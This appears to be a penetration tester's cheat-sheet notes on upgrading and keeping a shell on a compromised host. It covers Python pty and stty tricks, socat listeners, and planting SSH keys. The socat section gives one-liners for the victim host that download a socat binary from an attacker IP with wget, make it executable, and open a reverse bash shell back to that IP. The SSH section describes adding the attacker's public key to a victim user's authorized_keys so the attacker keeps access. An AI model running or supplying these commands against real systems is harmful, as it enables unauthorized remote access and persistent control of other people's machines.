Python Upgrade

#py_tty

1. The first step:

python3 -c 'import pty;pty.spawn("/bin/bash")'

if python is not available, use script

script -qc /bin/bash /dev/null

2. Step two is:

export TERM=xterm

or

export TERM=xterm-256color

3. we will background the shell using

Ctrl + Z

4. Check our terminal size

stty size

5. Back in our own terminal we use

stty raw -echo; fg
reset

6. This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes

stty rows 38 columns 116

Socat

#socat

Attacker

socat file:`tty`,raw,echo=0 tcp-listen:80

Victim

Manual (Slow):

cd /tmp

wget 192.168.45.221:53/socat;chmod +x socat

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.221:80

One Liner (Fast):

cd /tmp;wget 192.168.45.221:53/socat;chmod +x socat;./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.221:80

One Liner with IP variable (Faster):

export IP="192.168.45.175";cd /tmp;wget $IP:8000/socat;chmod +x socat;./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:80

SSH Keys Shell Upgrade

We can get an SSH access if the ssh port is open using our public ssh key

we start by generating a key pair in our machine

ssh-keygen

copy our public key to an authorized_keys file to be transferred to the victim user’s ~/.ssh/authorized_keys

cp /home/cyber02/.ssh/id_rsa.pub authorized_keys

Or append the public key contents to the authorized_keys of the victim user

Then login with our private key

ssh -i /home/cyber02/.ssh/id_rsa rose@192.168.130.231